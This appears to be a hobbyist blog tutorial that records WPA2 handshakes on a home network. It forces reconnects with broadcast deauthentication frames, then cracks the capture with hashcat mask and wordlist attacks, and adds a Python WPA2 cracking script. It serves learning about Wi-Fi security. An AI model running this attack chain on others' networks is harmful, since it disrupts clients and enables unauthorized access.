Recording Wifi Handshakes

Something cool I wanted to learn how to do was record Wifi handshakes. This is just a fun project I wanted to try. In this tutorial I record a handshake on my local network. My plan was to see how easy it would be to guess my own Wifi password. Remember to only use this on your own network and devices for learning purposes.

Setup Packages

The first step is to install the necessary packages: aircrack-ng for monitor mode and capture, hcxtools for converting the capture, and hashcat for cracking.

sudo apt update && sudo apt install -y \
    aircrack-ng \
    hcxtools \
    hashcat

Activate Wifi Monitor

Not all Wifi cards support monitor mode, so check your chipset and driver before buying anything for this. My built-in adapter (an Intel AX201 on the iwlwifi driver, as the output below shows) supports it, so that is what I will be using. airmon-ng creates a new monitor-mode interface named after the original with mon appended.

Here is a list of interfaces I have before activating monitor mode.

xadlien@swift3x:~$ ip l
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: wlp0s20f3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DORMANT group default qlen 1000

Now activate monitor mode. Take the warning in the output seriously: NetworkManager and wpa_supplicant will hop channels or flip the card back to managed mode while you capture, so either stop them first with sudo airmon-ng check kill or expect flaky results. When you are finished, sudo airmon-ng stop wlp0s20f3mon and restart NetworkManager to get normal Wifi back.

dan@ubuntu:~$ sudo airmon-ng start wlp0s20f3

Found 4 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
   1248 avahi-daemon
   1255 NetworkManager
   1299 wpa_supplicant
   1308 avahi-daemon

PHY	Interface	Driver		Chipset

phy0	wlp0s20f3	iwlwifi		14.3 Network controller: Intel Corporation Wi-Fi 6 AX201 (rev 20)
		(mac80211 monitor mode vif enabled for [phy0]wlp0s20f3 on [phy0]wlp0s20f3mon)
		(mac80211 station mode vif disabled for [phy0]wlp0s20f3)

We should see the new interface now.

xadlien@swift3x:~$ ip l
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: wlp0s20f3mon: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000

Find the BSSID

The next step is to find the BSSID (the access point's MAC address) of the network you want to capture from, and the channel it is on. Running airodump-ng with no filters lists every network the card can hear. Run the following, substituting your own monitor interface name, and wait a few seconds.

sudo airodump-ng wlp0s20f3mon

After a few seconds you should see something like this:

CH  4 ][ Elapsed: 24 s ][ 2022-04-02 20:53 

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 44:07:0B:03:41:F7  -21       17        1    0   1  130   WPA2 CCMP   PSK  Ralphthecat              
 44:07:0B:03:3F:9A  -27       20        1    0   6  130   WPA2 CCMP   PSK  Ralphthecat              
 44:07:0B:00:D2:30  -28        4        0    0   1  130   WPA2 CCMP   PSK  Ralphthecat              
 10:0C:6B:D3:2A:0B  -26        4        1    0   5  195   WPA2 CCMP   PSK  NETGEAR87                
 24:A0:74:79:C0:42  -44       24       31    0  11  195   WPA2 CCMP   PSK  Proverbs 3:5-6           
 10:0C:6B:4E:6A:7D  -63        9        5    0   8  195   WPA2 CCMP   PSK  NETGEAR14                

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 (not associated)   AA:6C:6E:11:9F:17  -63    0 - 1      0        1                                  
 (not associated)   96:A7:99:6E:D0:B8  -70    0 - 1      0        2                                  
 (not associated)   64:52:99:C7:67:5E  -87    0 - 1      0        5         belkin.13a               
 44:07:0B:00:D2:30  24:62:AB:3C:95:17  -88    0 - 6      0        1                                  
 24:A0:74:79:C0:42  6E:06:1E:B3:B7:43  -66    0 - 1    761       11                                  
 24:A0:74:79:C0:42  64:1C:AE:76:7E:F4  -60    0 -24e     0        8                                  
 24:A0:74:79:C0:42  F0:A3:B2:21:D5:F4  -61   24e- 1      0        3                                  
 24:A0:74:79:C0:42  86:A2:53:23:D4:20  -63   24e- 1     36        6                                  
 24:A0:74:79:C0:42  02:A8:DE:8E:28:FC  -69    0 - 1      0        6                                  
 24:A0:74:79:C0:42  5C:86:C1:15:CF:CB  -73    0 -12      0        1                                  
 24:A0:74:79:C0:42  F6:AD:56:6B:89:60  -77    1e-11      0        4

I want the Proverbs 3:5-6 network so I will use the BSSID 24:A0:74:79:C0:42.

Start Capturing Handshakes

Next we lock airodump-ng onto that BSSID and channel, write what it sees to a file, and wait for a client to join the network. Leave the following command running until a handshake shows up.

sudo airodump-ng --bssid 24:A0:74:79:C0:42 -c 11 -w capture1 --output-format pcap wlp0s20f3mon

Notice I'm using channel 11 (-c 11) since that is the channel this BSSID is broadcasting on, per the CH column above; -w capture1 makes airodump-ng write files named capture1-01.cap and so on. The output should look like the following. Once a handshake has been captured, "WPA handshake: <BSSID>" appears in the top line, and the EAPOL tag in the Notes column marks the clients whose key exchange was seen.

CH 11 ][ Elapsed: 18 s ][ 2022-04-02 21:05 ][ WPA handshake: 24:A0:74:79:C0:42

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH 

 24:A0:74:79:C0:42  -47 100      185      958   65  11  195   WPA2 CCMP   PSK  

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Pro

 24:A0:74:79:C0:42  A6:3B:D2:CF:0E:A1  -36    1e-24e   299        9             
 24:A0:74:79:C0:42  60:5B:B4:56:B9:9F  -48    1e- 1e    10       24  EAPOL      
 24:A0:74:79:C0:42  86:A2:53:23:D4:20  -67    1e- 1    386       87             
 24:A0:74:79:C0:42  02:A8:DE:8E:28:FC  -65    1e- 1      0       15             
 24:A0:74:79:C0:42  02:64:EE:05:57:75  -67   24e-24     55      127  EAPOL      
 24:A0:74:79:C0:42  64:1C:AE:76:7E:F4  -60   24e-24e   582      554  EAPOL  Prov
 24:A0:74:79:C0:42  F0:A3:B2:21:D5:F4  -64   24e- 1      0       10             
 24:A0:74:79:C0:42  6E:06:1E:B3:B7:43  -65    1e- 1      0        4             
 24:A0:74:79:C0:42  5C:86:C1:15:CF:CB  -73    1e-24     29       46  EAPOL      
 24:A0:74:79:C0:42  14:01:52:CB:8B:E2  -72    1e- 1e   307        7             
 24:A0:74:79:C0:42  F6:AD:56:6B:89:60  -77    1e-11      1        5             
 24:A0:74:79:C0:42  24:FC:E5:8A:A3:70  -81    0 -11e     0        2 

Forcing Handshakes

If you don't want to wait for someone to connect to the network you can force a handshake by sending deauthentication frames. A kicked client reconnects automatically and redoes the 4-way handshake, which airodump-ng then records. Run the following in a second terminal while airodump-ng keeps running: -0 1 sends one burst of deauth frames, and with no -c (client) option they are broadcast to every station on the BSSID. Networks with Protected Management Frames (802.11w) enabled ignore spoofed deauth frames, so this only works where PMF is off.

sudo aireplay-ng -0 1 -a 24:A0:74:79:C0:42 wlp0s20f3mon

You should see the WPA Handshake now.

Convert to hc22000

hashcat does not read pcap files directly. Its WPA mode (-m 22000) takes hc22000 lines, one per PMKID or EAPOL message pair found in the capture, and hcxpcapngtool from hcxtools does the extraction. It also prints a summary of how many EAPOL pairs and PMKIDs it wrote; if that is zero, the capture has no usable handshake and you need to go back and capture again.

hcxpcapngtool -o proverbs.hc22000 capture1-*.cap

Hashcat

Hashcat is a great tool to attempt to crack a password hash. The reason I’m using this tool is because it works with GPUs. I have an RTX 3060 and it’ll make the cracking process incredibly fast (sort of). We will go through two good ways to attempt a password crack. I say attempt because if the password is not simple or in a wordlist it may never finish.

Hashcat Pattern

The first thing we will try is a mask attack (-a 3). Unfortunately this may take a very long time; let's see just how long. In a hashcat mask ?l stands for one lowercase letter, so the mask below covers every 11-character lowercase password: 26^11, about 3.67 x 10^15 candidates, which is exactly the Progress total in the status output. For the other mask tokens see the hashcat mask-attack documentation.

hashcat -m 22000 proverbs.hc22000 -a 3 ?l?l?l?l?l?l?l?l?l?l?l

Pressing s shows the status, and at roughly 390 kH/s on an RTX 3060 the estimate is about 297 years. Note "Hashes: 4 digests" and "1 unique salts": the capture contained handshakes from the four clients marked EAPOL above, all on the same ESSID (the salt), so hashcat computes one PMK per candidate and checks it against all four; cracking any one of them gives the network password.

hashcat (v6.1.1) starting...

CUDA API (CUDA 11.4)
====================
* Device #1: NVIDIA GeForce RTX 3060, 11952/12053 MB, 28MCU

OpenCL API (OpenCL 3.0 CUDA 11.4.189) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: NVIDIA GeForce RTX 3060, skipped

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Hashes: 4 digests; 4 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers applied:
* Zero-Byte
* Single-Salt
* Brute-Force
* Slow-Hash-SIMD-LOOP

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 555 MB

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s

Session..........: hashcat
Status...........: Running
Hash.Name........: WPA-PBKDF2-PMKID+EAPOL
Hash.Target......: proverbs.hc22000
Time.Started.....: Sun Apr  3 15:18:55 2022 (3 secs)
Time.Estimated...: Mon Apr 14 01:27:18 2319 (297 years, 9 days)
Guess.Mask.......: ?l?l?l?l?l?l?l?l?l?l?l [11]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   391.6 kH/s (9.06ms) @ Accel:8 Loops:64 Thr:1024 Vec:1
Recovered........: 0/4 (0.00%) Digests
Progress.........: 1146880/3670344486987776 (0.00%)
Rejected.........: 0/1146880 (0.00%)
Restore.Point....: 0/141167095653376 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:5-6 Iteration:3968-4032
Candidates.#1....: parierinere -> piarkerdere
Hardware.Mon.#1..: Temp: 27c Fan:  0% Util:100% Core:1995MHz Mem:7300MHz Bus:4

Hashcat Wordlist

The second way we can approach this is with a wordlist (-a 0). A good one is rockyou.txt, which contains millions of real leaked passwords that people actually use. My advice: if your password is in that file, pick a new one. The command below feeds the wordlist on stdin; passing the path as an argument instead (hashcat -m 22000 proverbs.hc22000 -a 0 ~/Downloads/rockyou.txt) does the same job but lets hashcat show a progress percentage and an ETA, which it cannot do in pipe mode.

hashcat -m 22000 proverbs.hc22000 -a 0 < ~/Downloads/rockyou.txt

If the password is in the wordlist you'll see a status of "Cracked" at the end. Fortunately for my wifi network it's "Exhausted", which means the wordlist didn't contain the password. The Rejected line counts candidates hashcat threw out before hashing them: WPA passphrases must be 8 to 63 characters, which rules out about a third of rockyou.

Session..........: hashcat
Status...........: Exhausted
Hash.Name........: WPA-PBKDF2-PMKID+EAPOL
Hash.Target......: proverbs.hc22000
Time.Started.....: Sun Apr  3 15:26:04 2022 (30 secs)
Time.Estimated...: Sun Apr  3 15:26:34 2022 (0 secs)
Guess.Base.......: Pipe
Speed.#1.........:   318.9 kH/s (8.81ms) @ Accel:8 Loops:64 Thr:1024 Vec:1
Recovered........: 0/4 (0.00%) Digests
Progress.........: 14344384
Rejected.........: 4734913
Restore.Point....: 0
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:3-7
Candidates.#1....: $HEX[303332333237353637] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Temp: 57c Fan: 59% Util:100% Core:1957MHz Mem:7300MHz Bus:4
Started: Sun Apr  3 15:26:03 2022
Stopped: Sun Apr  3 15:26:35 2022
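To make concrete what hcxpcapngtool puts in the hc22000 file and what hashcat then does with every candidate, here is an added Python example. It is not code from the original post, hashcat or hcxtools. It constructs a synthetic WPA2-PSK handshake (made-up MACs, nonces, ESSID "example-net" and passphrase "correct horse battery"), writes it as hc22000 lines of both types (01 PMKID and 02 EAPOL), and runs a small dictionary attack that mirrors hashcat's Rejected counter and its single-salt PMK caching. It handles only message pair 00 (M1+M2, where the EAPOL frame is message 2 carrying the SNonce) and key descriptor version 2 (HMAC-SHA1-128, the WPA2/CCMP case seen in this capture).

```python
"""Offline WPA2-PSK check: what hashcat -m 22000 computes for one candidate.

Added example, not code from the original post, hashcat or hcxtools. All
handshake material below is constructed (fixed MACs, nonces, ESSID and
passphrase); nothing is read from a real capture.
"""
import hashlib
import hmac
import struct
from functools import lru_cache

MIC_OFFSET = 81  # MIC field sits at bytes 81..96 of an EAPOL-Key frame


@lru_cache(maxsize=None)
def pmk_from_passphrase(passphrase: str, essid: str) -> bytes:
    """PSK -> PMK: PBKDF2-HMAC-SHA1, 4096 rounds, 256 bits (IEEE 802.11).
    The 4096 rounds are why WPA2 runs at kH/s rather than GH/s. Caching by
    (passphrase, essid) mirrors hashcat's Single-Salt optimizer: one PMK per
    candidate serves every handshake captured from the same ESSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, mac_ap: bytes, mac_sta: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512: PTK = PRF(PMK, "Pairwise key expansion", min/max of the MACs and nonces)."""
    data = min(mac_ap, mac_sta) + max(mac_ap, mac_sta) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1-128 over the frame with its MIC field zeroed."""
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID as carried in the RSN IE of message 1: HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA)."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def build_message2(snonce: bytes) -> bytes:
    """EAPOL-Key message 2 (client -> AP), MIC field zeroed, WPA2-PSK/CCMP RSN IE as key data."""
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
    body = struct.pack(">BHH", 2, 0x010A, 0)          # descriptor type RSN, key info (v2|pairwise|MIC), key length
    body += (1).to_bytes(8, "big")                    # replay counter
    body += snonce + bytes(16) + bytes(8) + bytes(8)  # nonce, key IV, RSC, key ID
    body += bytes(16) + struct.pack(">H", len(rsn_ie)) + rsn_ie  # MIC (zero), key data length, key data
    return struct.pack(">BBH", 2, 3, len(body)) + body  # 802.1X header: version, type EAPOL-Key, length


def hc22000_eapol_line(mic, mac_ap, mac_sta, essid, anonce, eapol, messagepair=0) -> str:
    """Type 02 line: WPA*02*MIC*MACAP*MACSTA*ESSIDhex*ANONCE*EAPOL(MIC zeroed)*MESSAGEPAIR."""
    return "*".join(["WPA", "02", mic.hex(), mac_ap.hex(), mac_sta.hex(), essid.encode().hex(),
                     anonce.hex(), eapol.hex(), f"{messagepair:02x}"])


def hc22000_pmkid_line(pmkid_value, mac_ap, mac_sta, essid) -> str:
    """Type 01 line; the ANONCE, EAPOL and MESSAGEPAIR fields stay empty."""
    return "*".join(["WPA", "01", pmkid_value.hex(), mac_ap.hex(), mac_sta.hex(),
                     essid.encode().hex(), "", "", ""])


def check_candidate(line: str, passphrase: str) -> bool:
    """True if passphrase reproduces the PMKID or MIC recorded in one hc22000 line.
    Only message pair 00 (EAPOL frame is M2 and its nonce field is the SNonce) is handled."""
    _, kind, target, mac_ap, mac_sta, essid, anonce, eapol, _ = line.split("*")
    mac_ap, mac_sta = bytes.fromhex(mac_ap), bytes.fromhex(mac_sta)
    pmk = pmk_from_passphrase(passphrase, bytes.fromhex(essid).decode())
    if kind == "01":
        return pmkid(pmk, mac_ap, mac_sta) == bytes.fromhex(target)
    frame = bytes.fromhex(eapol)
    snonce = frame[17:49]
    kck = ptk_from_pmk(pmk, mac_ap, mac_sta, bytes.fromhex(anonce), snonce)[:16]
    return eapol_mic(kck, frame) == bytes.fromhex(target)


def crack(lines, candidates):
    """Dictionary attack over hc22000 lines. Returns ({line index: passphrase}, rejected).
    Candidates outside 8..63 characters are dropped before any hashing; that is
    what hashcat's Rejected counter reports."""
    recovered, rejected = {}, 0
    for cand in candidates:
        if not 8 <= len(cand) <= 63:
            rejected += 1
            continue
        for i, line in enumerate(lines):
            if i not in recovered and check_candidate(line, cand):
                recovered[i] = cand
    return recovered, rejected


def build_sample_capture(passphrase="correct horse battery", essid="example-net"):
    """Constructed handshake material: the two lines hcxpcapngtool would emit for one client."""
    mac_ap, mac_sta = bytes.fromhex("021122334455"), bytes.fromhex("02aabbccddee")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    pmk = pmk_from_passphrase(passphrase, essid)
    m2 = build_message2(snonce)
    mic = eapol_mic(ptk_from_pmk(pmk, mac_ap, mac_sta, anonce, snonce)[:16], m2)
    return [hc22000_eapol_line(mic, mac_ap, mac_sta, essid, anonce, m2),
            hc22000_pmkid_line(pmkid(pmk, mac_ap, mac_sta), mac_ap, mac_sta, essid)]


if __name__ == "__main__":
    hashes = build_sample_capture()
    print(crack(hashes, ["short", "wrongpassphrase", "correct horse battery"]))
```

Every candidate costs one PBKDF2 run of 4096 HMAC-SHA1 rounds before the cheap PTK and MIC steps, which is the whole reason the mask attack above is measured in centuries: the work is in the key derivation, not in checking the 16-byte MIC. The PMKID line needs no client handshake at all, only the RSN IE from message 1, which is why hashcat's mode name reads PMKID+EAPOL.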

Final Thoughts

This type of hash guessing can be used in a lot of different ways. Unix password cracking is also an application I may try for fun. Remember to only do this stuff on your own networks. I take no responsibility for what you do with this knowledge.